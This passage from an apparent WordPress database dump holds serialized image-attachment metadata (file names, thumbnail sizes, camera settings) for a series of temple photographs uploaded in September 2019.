";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_044-lg-250x187.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:187;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_044-lg-550x412.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:412;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_044-lg-240x180.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_044-lg-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_044-lg-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_044-lg-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"4.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:10:\"DSC-HX200V\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1442661414\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:5:\"15.62\";s:3:\"iso\";s:3:\"640\";s:13:\"shutter_speed\";s:4:\"0.01\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(25837,165262,'_wp_attached_file','2019/09/ECK_Temple_CO_045-lg.jpg'),(25838,165262,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:696;s:6:\"height\";i:463;s:4:\"file\";s:32:\"2019/09/ECK_Temple_CO_045-lg.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_045-lg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_045-lg-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_045-lg-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"ECK_Temple_CO_045-lg-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_045-lg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_045-lg-250x166.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:166;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_045-lg-550x366.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:366;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_045-lg-271x180.jpg\";s:5:\"width\";i:271;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_045-lg-451x300.jpg\";s:5:\"width\";i:451;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_045-lg-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_045-lg-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1442657992\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"35\";s:3:\"iso\";s:3:\"320\";s:13:\"shutter_speed\";s:5:\"0.125\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(25839,165263,'_wp_attached_file','2019/09/ECK_Temple_CO_046-lg.jpg'),(25840,165263,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:698;s:6:\"height\";i:463;s:4:\"file\";s:32:\"2019/09/ECK_Temple_CO_046-lg.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_046-lg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_046-lg-300x199.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_046-lg-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"ECK_Temple_CO_046-lg-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_046-lg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_046-lg-250x166.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:166;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_046-lg-550x365.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:365;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_046-lg-271x180.jpg\";s:5:\"width\";i:271;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_046-lg-452x300.jpg\";s:5:\"width\";i:452;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_046-lg-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_046-lg-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:6:\"NEX-5R\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1442664485\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"70\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:17:\"0.033333333333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(25841,165264,'_wp_attached_file','2019/09/ECK_Temple_CO_047-lg.jpg'),(25842,165264,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:618;s:6:\"height\";i:463;s:4:\"file\";s:32:\"2019/09/ECK_Temple_CO_047-lg.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_047-lg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_047-lg-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_047-lg-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"ECK_Temple_CO_047-lg-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_047-lg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_047-lg-250x187.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:187;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_047-lg-550x412.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:412;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_047-lg-240x180.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_047-lg-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_047-lg-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_047-lg-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:8:\"iPhone 6\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1442690087\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"4.15\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:17:\"0.033333333333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(25843,165265,'_wp_attached_file','2019/09/ECK_Temple_CO_048-lg.jpg'),(25844,165265,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:618;s:6:\"height\";i:463;s:4:\"file\";s:32:\"2019/09/ECK_Temple_CO_048-lg.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_048-lg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_048-lg-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_048-lg-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"ECK_Temple_CO_048-lg-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_048-lg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_048-lg-250x187.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:187;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_048-lg-550x412.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:412;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_048-lg-240x180.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_048-lg-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_048-lg-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_048-lg-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:8:\"iPhone 6\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1442690072\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"4.15\";s:3:\"iso\";s:3:\"320\";s:13:\"shutter_speed\";s:17:\"0.066666666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(25845,165266,'_wp_attached_file','2019/09/ECK_Temple_CO_049-lg.jpg'),(25846,165266,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:696;s:6:\"height\";i:463;s:4:\"file\";s:32:\"2019/09/ECK_Temple_CO_049-lg.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_049-lg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_049-lg-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_049-lg-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"ECK_Temple_CO_049-lg-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_049-lg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_049-lg-250x166.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:166;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_049-lg-550x366.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:366;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_049-lg-271x180.jpg\";s:5:\"width\";i:271;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_049-lg-451x300.jpg\";s:5:\"width\";i:451;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_049-lg-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_049-lg-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1442659897\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"76\";s:3:\"iso\";s:4:\"3200\";s:13:\"shutter_speed\";s:6:\"0.0005\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(25847,165267,'_wp_attached_file','2019/09/ECK_Temple_CO_050-lg.jpg'),(25848,165267,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:698;s:6:\"height\";i:463;s:4:\"file\";s:32:\"2019/09/ECK_Temple_CO_050-lg.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_050-lg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_050-lg-300x199.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_050-lg-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"ECK_Temple_CO_050-lg-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_050-lg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_050-lg-250x166.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:166;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_050-lg-550x365.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:365;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_050-lg-271x180.jpg\";s:5:\"width\";i:271;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_050-lg-452x300.jpg\";s:5:\"width\";i:452;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_050-lg-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_050-lg-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:6:\"NEX-5R\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1442657371\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"30\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:17:\"0.033333333333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(25849,165268,'_wp_attached_file','2019/09/ECK_Temple_CO_051-lg.jpg'),(25850,165268,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:618;s:6:\"height\";i:463;s:4:\"file\";s:32:\"2019/09/ECK_Temple_CO_051-lg.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_051-lg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_051-lg-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_051-lg-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"ECK_Temple_CO_051-lg-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_051-lg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_051-lg-250x187.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:187;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_051-lg-550x412.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:412;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_051-lg-240x180.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_051-lg-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_051-lg-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_051-lg-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:10:\"DSC-HX200V\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1442655671\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.8\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:17:\"0.033333333333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(25851,165269,'_wp_attached_file','2019/09/ECK_Temple_CO_052-lg.jpg'),(25852,165269,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:618;s:6:\"height\";i:463;s:4:\"file\";s:32:\"2019/09/ECK_Temple_CO_052-lg.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_052-lg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_052-lg-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_052-lg-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"ECK_Temple_CO_052-lg-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_052-lg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_052-lg-250x187.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:187;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_052-lg-550x412.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:412;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_052-lg-240x180.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_052-lg-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_052-lg-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_052-lg-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:10:\"DSC-HX200V\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1442654782\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.8\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:6:\"0.0125\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(25853,165270,'_wp_attached_file','2019/09/ECK_Temple_CO_053-lg.jpg'),(25854,165270,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:698;s:6:\"height\";i:463;s:4:\"file\";s:32:\"2019/09/ECK_Temple_CO_053-lg.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_053-lg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_053-lg-300x199.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_053-lg-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"ECK_Temple_CO_053-lg-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_053-lg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"